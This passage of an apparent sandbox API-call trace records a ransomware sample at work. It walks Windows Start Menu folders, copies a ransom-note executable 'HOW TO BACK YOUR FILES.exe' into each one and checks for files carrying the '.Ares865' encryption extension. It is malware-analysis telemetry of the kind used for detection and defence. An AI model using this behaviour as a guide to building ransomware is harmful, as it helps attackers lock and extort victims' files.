returned 0 [0090.415] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" [0090.415] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" [0090.415] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.415] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.416] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.416] GetLastError () returned 0x0 [0090.416] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.416] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.416] CloseHandle (hObject=0x120) returned 1 [0090.416] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.416] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x597fad20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.417] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.417] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Backup and Restore Center.lnk.Ares865" | out: lpString1="Backup and Restore Center.lnk.Ares865") returned="Backup and Restore Center.lnk.Ares865" [0090.417] lstrlenW (lpString="Backup and Restore Center.lnk.Ares865") returned 37 [0090.417] lstrlenW (lpString="Ares865") returned 7 [0090.417] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.417] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Create Recovery Disc.lnk.Ares865" | out: lpString1="Create Recovery Disc.lnk.Ares865") returned="Create Recovery Disc.lnk.Ares865" [0090.417] lstrlenW (lpString="Create Recovery Disc.lnk.Ares865") returned 32 [0090.417] lstrlenW (lpString="Ares865") returned 7 [0090.417] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.417] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Desktop.ini.Ares865" | out: lpString1="Desktop.ini.Ares865") returned="Desktop.ini.Ares865" [0090.417] lstrlenW (lpString="Desktop.ini.Ares865") returned 19 [0090.417] lstrlenW (lpString="Ares865") returned 7 [0090.417] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.417] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Remote Assistance.lnk.Ares865" | out: lpString1="Remote Assistance.lnk.Ares865") returned="Remote Assistance.lnk.Ares865" [0090.417] lstrlenW (lpString="Remote Assistance.lnk.Ares865") returned 29 [0090.417] lstrlenW (lpString="Ares865") returned 7 [0090.417] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.418] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java" [0090.418] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java" [0090.418] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.418] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.418] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.418] GetLastError () returned 0x0 [0090.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.419] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.419] CloseHandle (hObject=0x120) returned 1 [0090.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.419] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7577bc60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x59b66cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59b66cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.419] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.419] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.419] lstrcpyW (in: lpString1=0x2cce49c, lpString2="About Java.lnk.Ares865" | out: lpString1="About Java.lnk.Ares865") returned="About Java.lnk.Ares865" [0090.419] lstrlenW (lpString="About Java.lnk.Ares865") returned 22 [0090.419] lstrlenW (lpString="Ares865") returned 7 [0090.419] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.419] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Check For Updates.lnk.Ares865" | out: lpString1="Check For Updates.lnk.Ares865") returned="Check For Updates.lnk.Ares865" [0090.419] lstrlenW (lpString="Check For Updates.lnk.Ares865") returned 29 [0090.419] lstrlenW (lpString="Ares865") returned 7 [0090.419] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.419] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Configure Java.lnk.Ares865" | out: lpString1="Configure Java.lnk.Ares865") returned="Configure Java.lnk.Ares865" [0090.420] lstrlenW (lpString="Configure Java.lnk.Ares865") returned 26 [0090.420] lstrlenW (lpString="Ares865") returned 7 [0090.420] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.420] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Get Help.lnk.Ares865" | out: lpString1="Get Help.lnk.Ares865") returned="Get Help.lnk.Ares865" [0090.420] lstrlenW (lpString="Get Help.lnk.Ares865") returned 20 [0090.420] lstrlenW (lpString="Ares865") returned 7 [0090.420] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.420] lstrcpyW (in: lpString1=0x2cce49c, lpString2="Visit Java.com.lnk.Ares865" | out: lpString1="Visit Java.com.lnk.Ares865") returned="Visit Java.com.lnk.Ares865" [0090.420] lstrlenW (lpString="Visit Java.com.lnk.Ares865") returned 26 [0090.420] lstrlenW (lpString="Ares865") returned 7 [0090.420] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.420] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games" [0090.420] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games" [0090.420] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.420] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.421] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.421] GetLastError () returned 0x0 [0090.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.421] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.421] CloseHandle (hObject=0x120) returned 1 [0090.421] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.421] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x59c4b500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59c4b500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.421] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.421] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.422] lstrcpyW (in: lpString1=0x2cce49e, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.422] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.422] lstrlenW (lpString="Ares865") returned 7 [0090.422] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.422] lstrcpyW (in: lpString1=0x2cce49e, lpString2="GameExplorer.lnk.Ares865" | out: lpString1="GameExplorer.lnk.Ares865") returned="GameExplorer.lnk.Ares865" [0090.422] lstrlenW (lpString="GameExplorer.lnk.Ares865") returned 24 [0090.422] lstrlenW (lpString="Ares865") returned 7 [0090.422] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.422] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0090.422] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0090.422] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.422] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.423] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.423] GetLastError () returned 0x0 [0090.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.423] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.423] CloseHandle (hObject=0x120) returned 1 [0090.423] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.423] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a0298c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a0298c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Component Services.lnk.Ares865" | out: lpString1="Component Services.lnk.Ares865") returned="Component Services.lnk.Ares865" [0090.424] lstrlenW (lpString="Component Services.lnk.Ares865") returned 30 [0090.424] lstrlenW (lpString="Ares865") returned 7 [0090.424] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Computer Management.lnk.Ares865" | out: lpString1="Computer Management.lnk.Ares865") returned="Computer Management.lnk.Ares865" [0090.424] lstrlenW (lpString="Computer Management.lnk.Ares865") returned 31 [0090.424] lstrlenW (lpString="Ares865") returned 7 [0090.424] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Data Sources (ODBC).lnk.Ares865" | out: lpString1="Data Sources (ODBC).lnk.Ares865") returned="Data Sources (ODBC).lnk.Ares865" [0090.424] lstrlenW (lpString="Data Sources (ODBC).lnk.Ares865") returned 31 [0090.424] lstrlenW (lpString="Ares865") returned 7 [0090.424] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.424] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.424] lstrlenW (lpString="Ares865") returned 7 [0090.424] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Event Viewer.lnk.Ares865" | out: lpString1="Event Viewer.lnk.Ares865") returned="Event Viewer.lnk.Ares865" [0090.424] lstrlenW (lpString="Event Viewer.lnk.Ares865") returned 24 [0090.424] lstrlenW (lpString="Ares865") returned 7 [0090.424] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.424] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="iSCSI Initiator.lnk.Ares865" | out: lpString1="iSCSI Initiator.lnk.Ares865") returned="iSCSI Initiator.lnk.Ares865" [0090.425] lstrlenW (lpString="iSCSI Initiator.lnk.Ares865") returned 27 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Memory Diagnostics Tool.lnk.Ares865" | out: lpString1="Memory Diagnostics Tool.lnk.Ares865") returned="Memory Diagnostics Tool.lnk.Ares865" [0090.425] lstrlenW (lpString="Memory Diagnostics Tool.lnk.Ares865") returned 35 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Performance Monitor.lnk.Ares865" | out: lpString1="Performance Monitor.lnk.Ares865") returned="Performance Monitor.lnk.Ares865" [0090.425] lstrlenW (lpString="Performance Monitor.lnk.Ares865") returned 31 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Print Management.lnk.Ares865" | out: lpString1="Print Management.lnk.Ares865") returned="Print Management.lnk.Ares865" [0090.425] lstrlenW (lpString="Print Management.lnk.Ares865") returned 28 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Security Configuration Management.lnk.Ares865" | out: lpString1="Security Configuration Management.lnk.Ares865") returned="Security Configuration Management.lnk.Ares865" [0090.425] lstrlenW (lpString="Security Configuration Management.lnk.Ares865") returned 45 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="services.lnk.Ares865" | out: lpString1="services.lnk.Ares865") returned="services.lnk.Ares865" [0090.425] lstrlenW (lpString="services.lnk.Ares865") returned 20 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.425] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.425] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="System Configuration.lnk.Ares865" | out: lpString1="System Configuration.lnk.Ares865") returned="System Configuration.lnk.Ares865" [0090.425] lstrlenW (lpString="System Configuration.lnk.Ares865") returned 32 [0090.425] lstrlenW (lpString="Ares865") returned 7 [0090.426] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.426] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Task Scheduler.lnk.Ares865" | out: lpString1="Task Scheduler.lnk.Ares865") returned="Task Scheduler.lnk.Ares865" [0090.426] lstrlenW (lpString="Task Scheduler.lnk.Ares865") returned 26 [0090.426] lstrlenW (lpString="Ares865") returned 7 [0090.426] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.426] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Windows Firewall with Advanced Security.lnk.Ares865" | out: lpString1="Windows Firewall with Advanced Security.lnk.Ares865") returned="Windows Firewall with Advanced Security.lnk.Ares865" [0090.426] lstrlenW (lpString="Windows Firewall with Advanced Security.lnk.Ares865") returned 51 [0090.426] lstrlenW (lpString="Ares865") returned 7 [0090.426] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.426] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" [0090.426] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories" [0090.426] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.426] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.427] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.427] GetLastError () returned 0x0 [0090.427] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.428] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.428] CloseHandle (hObject=0x120) returned 1 [0090.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.428] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a47a0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a47a0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.428] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.428] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.428] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell" [0090.428] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.428] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\accessories\\windows powershell\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.429] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.429] GetLastError () returned 0x0 [0090.429] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.429] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.429] CloseHandle (hObject=0x120) returned 1 [0090.430] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.430] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a512620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a512620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.430] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.430] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.430] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC" [0090.430] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW 